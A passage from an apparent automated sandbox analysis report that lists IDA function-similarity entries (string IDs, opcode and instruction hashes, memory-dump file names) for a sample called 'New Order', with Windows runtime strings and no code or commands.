                                                                                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                              • API String ID: 0-2547482624
                                                                                                                              • Opcode ID: 545060195e2b811de51351494d70f6e11879a74e07222af0b791a264332a77b4
                                                                                                                              • Instruction ID: 0b74e299e55be66835d088ad4763254e8702e10a7d5b6c135e859e49d400e9a0
                                                                                                                              • Opcode Fuzzy Hash: 545060195e2b811de51351494d70f6e11879a74e07222af0b791a264332a77b4
                                                                                                                              • Instruction Fuzzy Hash: 0851DE7150470A8FC766DF68C8407A3BBE5AF84340F10883EFAAAC7281E735D645CB92
                                                                                                                              Strings
                                                                                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 0180A2FB
                                                                                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 0180A309
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                              • API String ID: 0-2876891731
                                                                                                                              • Opcode ID: 55a8f8b4b9ac187d6bf8b951d7f71ecad906b5aca314522c6c6a75d3145b5cb8
                                                                                                                              • Instruction ID: f0a69befccfb02fc33103bb96ce6c915691ef210ed025aaf160d45e46b471950
                                                                                                                              • Opcode Fuzzy Hash: 55a8f8b4b9ac187d6bf8b951d7f71ecad906b5aca314522c6c6a75d3145b5cb8
                                                                                                                              • Instruction Fuzzy Hash: 0D41BE31A04749CBEB2ACF5DC840B69BBB9FF94304F1540A5E904DB2A1E6B5DB00CB41
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID: Cleanup Group$Threadpool!
                                                                                                                              • API String ID: 2994545307-4008356553
                                                                                                                              • Opcode ID: b97fbcda27953e8e3a9ad40b0841319ce87778057205c7d575f073a978006289
                                                                                                                              • Instruction ID: 0bb9a90092af779a432a2f5eda9ab899e45536ce486e49ebd92ba92d24a18d1e
                                                                                                                              • Opcode Fuzzy Hash: b97fbcda27953e8e3a9ad40b0841319ce87778057205c7d575f073a978006289
                                                                                                                              • Instruction Fuzzy Hash: E101D1B2244708AFD311DF18CD45F1677F8EB84B15F058939A688C7190F738DA04DB86
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: MUI
                                                                                                                              • API String ID: 0-1339004836
                                                                                                                              • Opcode ID: 87e114587c1d09d26ba3623b97ddf40cc913b0fe06b7a42b67d42d532c9480c8
                                                                                                                              • Instruction ID: 8263deea1f293c5f4b0546929680b45c0aea733a5b11d96d065a0a7d6797bcb1
                                                                                                                              • Opcode Fuzzy Hash: 87e114587c1d09d26ba3623b97ddf40cc913b0fe06b7a42b67d42d532c9480c8
                                                                                                                              • Instruction Fuzzy Hash: 3E824D75E0061D8FEBA6CFA9CC807EDBBB1BF44314F1482A9D959EB291D7309A41CB50
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 0-3916222277
                                                                                                                              • Opcode ID: 6fadf4e969d41f50fab03e731938158b0d29b72836cf37f37cc89a3c3b2b0a17
                                                                                                                              • Instruction ID: 2a2ce680f2a736e766197fb8b5160ec6aae6718ecda04119d352ff26771019f6
                                                                                                                              • Opcode Fuzzy Hash: 6fadf4e969d41f50fab03e731938158b0d29b72836cf37f37cc89a3c3b2b0a17
                                                                                                                              • Instruction Fuzzy Hash: D3917771940219AFDB21DF99CD45FAE7BB8EF19B50F200065F600EB191E774AE40CB61
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 0-3916222277
                                                                                                                              • Opcode ID: 45ce43a1f4e0b479dbbfd69e13fd07d106bbfa1fd0e78430aa67316f9a3444a1
                                                                                                                              • Instruction ID: 1597f7a9f9ea6ac8ed228c61a01b1ce632975baf093d5260b1c0be8ea4190f81
                                                                                                                              • Opcode Fuzzy Hash: 45ce43a1f4e0b479dbbfd69e13fd07d106bbfa1fd0e78430aa67316f9a3444a1
                                                                                                                              • Instruction Fuzzy Hash: 1391A032900609BFEB22AFA9DC44FAFBBB9EF85754F540419F501E7251EB349A01CB91
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: GlobalTags
                                                                                                                              • API String ID: 0-1106856819
                                                                                                                              • Opcode ID: ccbf498b42c8dd9f8d64d02c753e7e10ad121971b2370dd181a17a0576ba891d
                                                                                                                              • Instruction ID: 901ef4b4d455147b451a15bf83a5afd47658c47971892063be97478087b21a87
                                                                                                                              • Opcode Fuzzy Hash: ccbf498b42c8dd9f8d64d02c753e7e10ad121971b2370dd181a17a0576ba891d
                                                                                                                              • Instruction Fuzzy Hash: AA716CB5E0060A8FEF29CF9CC4906ADBBB1BF58744F24812EE505E7241F7318A41CB50
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: .mui
                                                                                                                              • API String ID: 0-1199573805
                                                                                                                              • Opcode ID: 1867b2205b5a1aed49d4882bbbfc7c6067399a4a83d8c0655ec6833b5706c0d3
                                                                                                                              • Instruction ID: 58cbc55642a4c4f023c4eeebeeb256ec8b1c57df391184e688f72e187876d7df
                                                                                                                              • Opcode Fuzzy Hash: 1867b2205b5a1aed49d4882bbbfc7c6067399a4a83d8c0655ec6833b5706c0d3
                                                                                                                              • Instruction Fuzzy Hash: 10519672D00229DBEF11DF9DD850AAEBBB4AF04B14F494129EA12F7251D7B49E01CBE4
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: EXT-
                                                                                                                              • API String ID: 0-1948896318
                                                                                                                              • Opcode ID: 7762325baa04e6afaa282b3dd9c009c25601897a9b44f301e06083925790a714
                                                                                                                              • Instruction ID: d54fc9ccee3b0142d0aebfab3b9c2926582d4ae93fd97759eb4dfd0ef93925cf
                                                                                                                              • Opcode Fuzzy Hash: 7762325baa04e6afaa282b3dd9c009c25601897a9b44f301e06083925790a714
                                                                                                                              • Instruction Fuzzy Hash: D5416F735083169BE712DA69C840B6BBBECAF88718F440D2DFA84D7184E674DB048793
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: BinaryHash
                                                                                                                              • API String ID: 0-2202222882
                                                                                                                              • Opcode ID: 704bdafd8cd11c999788028615133150616561d7c15f5368abd9d1852cbac00b
                                                                                                                              • Instruction ID: cfaebaab8a47ede88da140f90fe21f32682a1293718887d028af060e6432444a
                                                                                                                              • Opcode Fuzzy Hash: 704bdafd8cd11c999788028615133150616561d7c15f5368abd9d1852cbac00b
                                                                                                                              • Instruction Fuzzy Hash: E44163B1D0052EABDB21DA54CC84FDEB77CAB45714F0045A5EB08EB141DB309F898FA5
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: #
                                                                                                                              • API String ID: 0-1885708031
                                                                                                                              • Opcode ID: 9fd461d5a51962e9beefd3a35b3b32c6b114f61fa8bcb01a400e43af91cbb0cc
                                                                                                                              • Instruction ID: fba21979bffd87878c6cc6d04e908ec4259a1dd1e3bb3a7add5996e6ae4d7f9b
                                                                                                                              • Opcode Fuzzy Hash: 9fd461d5a51962e9beefd3a35b3b32c6b114f61fa8bcb01a400e43af91cbb0cc
                                                                                                                              • Instruction Fuzzy Hash: 36310C31A007599BDF22DF6DC850FAE7BA8DF55708F284028F941EB282E775EA05CB50
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: BinaryName
                                                                                                                              • API String ID: 0-215506332
                                                                                                                              • Opcode ID: be23cf2ecf3f9fa927af179a58f17fcd72f907db2281274a2083de5604417586
                                                                                                                              • Instruction ID: 9ad06c2cd6833d0a76da94f4db3ca52abdfc596459895b38ba5c3052cd90c104
                                                                                                                              • Opcode Fuzzy Hash: be23cf2ecf3f9fa927af179a58f17fcd72f907db2281274a2083de5604417586
                                                                                                                              • Instruction Fuzzy Hash: 8B31DF7690051AAFEB16DA5DC845E7FBBB4EB80720F114129B905E7251D730DF04DBE0
                                                                                                                              Strings
                                                                                                                              • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0188895E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                              • API String ID: 0-702105204
                                                                                                                              • Opcode ID: 3f6b142f366a864286f793af6b24d0b86653b7200d7808a6763c5fd07c3d514b
                                                                                                                              • Instruction ID: cd3517256e2fb0a585fb2f21b6e860262d2d51fc2dfaf8237e5ed038533ee910
                                                                                                                              • Opcode Fuzzy Hash: 3f6b142f366a864286f793af6b24d0b86653b7200d7808a6763c5fd07c3d514b
                                                                                                                              • Instruction Fuzzy Hash: 4D01F2366002059BE631BB59CD84E6A7FA5EF86354B44012CF741D6152CB30AF80CBA2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4b2bfb74ef0d61070f12da1044288baaf4a7167eb76ef94ce55835fbe308fd25
                                                                                                                              • Instruction ID: b996b7078ae41a3097e93dd21356eb66389468116ceec0e9615025190a1ea4f4
                                                                                                                              • Opcode Fuzzy Hash: 4b2bfb74ef0d61070f12da1044288baaf4a7167eb76ef94ce55835fbe308fd25
                                                                                                                              • Instruction Fuzzy Hash: 2D42C4356083419BF735CF68C890A6BBBE6BF88704F88092DFA86D7250D771DA45CB52
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6fe954fd4faf6eaa55c8ec25c83ce06cf4422a958bd4a6bde6b57530736f18a1
                                                                                                                              • Instruction ID: b3026dd2780273fc95c0c148fc6e45b9158ea4ff0c6fef6e8adaa3ac441d0e34
                                                                                                                              • Opcode Fuzzy Hash: 6fe954fd4faf6eaa55c8ec25c83ce06cf4422a958bd4a6bde6b57530736f18a1
                                                                                                                              • Instruction Fuzzy Hash: 08425275E002199FDF25CF69C881BADBBF5BF46300F188099E949EB241D7349A85CF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a25c6ce502f7e27ccc724d33d6f3312000260b284cca23f016db6283407c3c9e
                                                                                                                              • Instruction ID: 5483b70123857fd531b4fc1e56b7fffbc8a16fab79ca623387fcfcecf8216744
                                                                                                                              • Opcode Fuzzy Hash: a25c6ce502f7e27ccc724d33d6f3312000260b284cca23f016db6283407c3c9e
                                                                                                                              • Instruction Fuzzy Hash: 6F32CD70A007998BEB25CF6DC844BBABBFABF84304F24411DD546DB285E735AA41CB91
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 08130a14e4737893df796ddb01f57ddaa3f555ac4e68d61fc95bac6ed5956614
                                                                                                                              • Instruction ID: bce0e7ffbf90539d4d5d95b8c15b20d42b39977e8d91815169496b426c126c41
                                                                                                                              • Opcode Fuzzy Hash: 08130a14e4737893df796ddb01f57ddaa3f555ac4e68d61fc95bac6ed5956614
                                                                                                                              • Instruction Fuzzy Hash: 2022C1742046658BFB29CF2DC090772BBF1AF44304F888459E9D6CFA86E775E652CB60
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 61f78336b59829c279ea02f37216f7dc82c3e849cf208784f93ea3a303814074
                                                                                                                              • Instruction ID: 94d0be69100b43bbcc222644c2730d32e65f7d6bbe6adca11b200bb8d1ee3c99
                                                                                                                              • Opcode Fuzzy Hash: 61f78336b59829c279ea02f37216f7dc82c3e849cf208784f93ea3a303814074
                                                                                                                              • Instruction Fuzzy Hash: 20223070E0012A9BCF15CF99C5809BEFBF6BF49314B14815AE985DB241E734DE81DB64
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a6483da33f6c657cbe37dfd7eaf801353af7a61f98553d94981a51715b66ecec
                                                                                                                              • Instruction ID: 5ecfc22ffdd6ef8425cf3cf3de8d7f3a918304f9fafd3aff6ccbd113e49431ef
                                                                                                                              • Opcode Fuzzy Hash: a6483da33f6c657cbe37dfd7eaf801353af7a61f98553d94981a51715b66ecec
                                                                                                                              • Instruction Fuzzy Hash: 5E32C271A00609CFDB56CF68C880BAAB7F5FF88304F244569E955EB392E734EA51CB50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                              • Instruction ID: a6683f2d182f2a326291267539fa5592a91754e35ad1ec875c029a911ffec01a
                                                                                                                              • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                              • Instruction Fuzzy Hash: BEF16371E0022A9BDF16CF99D590BAEBBF9BF44714F048129E905EB341E774DA81CB60
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: be4b5461228ae44b06d8826b79b7432d09279818fa1f811ab096b07ab0880bf8
                                                                                                                              • Instruction ID: 93406782b4ee2438e52ec73adad900c6b584ccece8c7b756566ad45c747f9e97
                                                                                                                              • Opcode Fuzzy Hash: be4b5461228ae44b06d8826b79b7432d09279818fa1f811ab096b07ab0880bf8
                                                                                                                              • Instruction Fuzzy Hash: EBD1E271A0060F9BDF15CF69C841ABEBBF1AF8A308F1C8169D955E7241D739EA05CB60
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b96f2c41293cb23b851b9f356e9cdbee860f758cdc4d5792a59fe823dd8b33ef
                                                                                                                              • Instruction ID: 494d3fcfa8b50ec21ca1a2db9b6822149b6fd957ed3a8f2d10d25239b5fe89a4
                                                                                                                              • Opcode Fuzzy Hash: b96f2c41293cb23b851b9f356e9cdbee860f758cdc4d5792a59fe823dd8b33ef
                                                                                                                              • Instruction Fuzzy Hash: 80E19F71508345CFC756CF28C880A6ABBE1FF89314F148A6DE595C7391EB31EA15CB92
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 381a8f48ebe9ba435308cb229dae1d0a6113696ab0750126548f74d9fd1b5523
                                                                                                                              • Instruction ID: 0d64fa971943df8115d79774e07879579b806675a9eb4ded3b90b4cac03256d4
                                                                                                                              • Opcode Fuzzy Hash: 381a8f48ebe9ba435308cb229dae1d0a6113696ab0750126548f74d9fd1b5523
                                                                                                                              • Instruction Fuzzy Hash: 57D1C371A0060A9BDB14DF68C880BBBB7E5FF54314F14466DEA15DB381E734DA50CB62
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                              • Instruction ID: ba19f1ec713c1acffe1772e406fb6381ce1e55ba25d583c00de13c1ea5d11004
                                                                                                                              • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                              • Instruction Fuzzy Hash: CCB1A574A006099FDF24EF98C940EABBBB9FF86304F94445DAA02D7791DB74EA05CB10
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                              • Instruction ID: e64c1ae80a20750c2decfa1e52cb4a9dd8695febce881101b7ce0dcae61f7e54
                                                                                                                              • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                              • Instruction Fuzzy Hash: 79B1053260464AAFDB11CBA8CC50BBEBBFAAF44304F140555E652DB385DB30EB81CB91
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9ee7e95b343e2c0db9a6004f9500f63777e71b10aec98e0e8689841958f0baa6
                                                                                                                              • Instruction ID: aa696d72eaf45fae5aedd2be7453c322dca90e00ab7e36d075bbe0d120954268
                                                                                                                              • Opcode Fuzzy Hash: 9ee7e95b343e2c0db9a6004f9500f63777e71b10aec98e0e8689841958f0baa6
                                                                                                                              • Instruction Fuzzy Hash: C0C169706083458FD765CF19C884BABB7E9BF88304F44492DE989C7291D775EA48CF92
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9dba18bf8aae111821b85a469511fd55364f53c85d5ae259cd8ad111316dd1a4
                                                                                                                              • Instruction ID: 32d9118590433cd8ab0e619d56509956c61f4adbf46fc64e3cc83f45ec92865d
                                                                                                                              • Opcode Fuzzy Hash: 9dba18bf8aae111821b85a469511fd55364f53c85d5ae259cd8ad111316dd1a4
                                                                                                                              • Instruction Fuzzy Hash: 2AB17170A002698BDB65CF58C884BAAF7B5EF44700F1485EDDA4AE7341EB309E85CB21
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e120a6e61b6431de78d9180202a8367a17517a82e77139e9bf4c43084c15ae84
                                                                                                                              • Instruction ID: 9d0bf0f7ba1b2fb3f5387d82fe87606b3d9b8e54571d35e5834b8a6e6ace2986
                                                                                                                              • Opcode Fuzzy Hash: e120a6e61b6431de78d9180202a8367a17517a82e77139e9bf4c43084c15ae84
                                                                                                                              • Instruction Fuzzy Hash: 8BA1E431E006699FEB32DB5CD854FAEBBA9AB00714F050125EB11EB291D774DF80CB95
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7f0bca7dd6bd3431f20a18114fb23c04f5ed386e52ea79a19f7a5a2cac821d11
                                                                                                                              • Instruction ID: 8244f284fcdc8851f7e284f6592b14fe36b15207ae5dff29661b674eddceb3e6
                                                                                                                              • Opcode Fuzzy Hash: 7f0bca7dd6bd3431f20a18114fb23c04f5ed386e52ea79a19f7a5a2cac821d11
                                                                                                                              • Instruction Fuzzy Hash: DCA1BE70A0061E9BDB25CF69C990BABB7B1FF54318F044129EB45DB281EB34EA51CB90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0377b30ccd8cb085acafd1c23cbd75e1292b9b6f2f404d80ac87dd102deb5014
                                                                                                                              • Instruction ID: 914468e9988467b728d7e856ac4fd8f409f97f5734f17bb9b59122712a3990ba
                                                                                                                              • Opcode Fuzzy Hash: 0377b30ccd8cb085acafd1c23cbd75e1292b9b6f2f404d80ac87dd102deb5014
                                                                                                                              • Instruction Fuzzy Hash: 8EA1CA72A04712AFC721DF18C980B5ABBE9FF48754F15062CF589DBA55D734EA00CB92
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e2f6db530a24d76bf63f1e3fd9406f7e642f0c1dab981a117b19667611ed6f1c
                                                                                                                              • Instruction ID: 5270e3f213830114e3d4881a50b2074bdc774addb04e6985f8709b21f1e7ec2f
                                                                                                                              • Opcode Fuzzy Hash: e2f6db530a24d76bf63f1e3fd9406f7e642f0c1dab981a117b19667611ed6f1c
                                                                                                                              • Instruction Fuzzy Hash: 88917171D0061AAFDB15DF68D884BAEBFB5AF49710F254169E610EB341E734EF009BA0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
